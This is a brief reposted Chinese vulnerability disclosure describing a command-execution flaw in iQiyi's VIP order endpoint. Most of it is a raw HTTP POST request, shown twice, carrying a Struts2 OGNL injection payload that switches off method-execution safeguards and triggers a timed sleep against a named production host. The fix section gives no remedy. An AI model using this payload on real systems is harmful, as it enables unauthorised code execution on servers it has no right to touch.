百度iqiyi(爱奇艺)一个命令执行

2012-6-11 15:11:53 来源:网络转载 浏览:818
百度最新漏洞公布:百度iqiyi(爱奇艺)一个命令执行漏洞。

简要描述:
百度iqiyi一个命令执行

详细说明:

POST /order/preview.action HTTP/1.1
Accept-Encoding: identity
Content-Length: 167
Host: serv.vip.iqiyi.com
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Python-urllib/2.7
cid=(#context["xwork.MethodAccessor.denyMethodExecution"]=false, #_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Thread@sleep(10000))(meh)&top['cid'](0)=true

漏洞证明:
反弹ls

百度iqiyi一个命令执行

【图一】

百度iqiyi一个命令执行

【图二】
通过sleep测试

POST /order/preview.action HTTP/1.1
Accept-Encoding: identity
Content-Length: 167
Host: serv.vip.iqiyi.com
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Python-urllib/2.7
cid=(#context["xwork.MethodAccessor.denyMethodExecution"]=false, #_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Thread@sleep(10000))(meh)&top['cid'](0)=true

修复方案:
专家懂的

(0)
(0)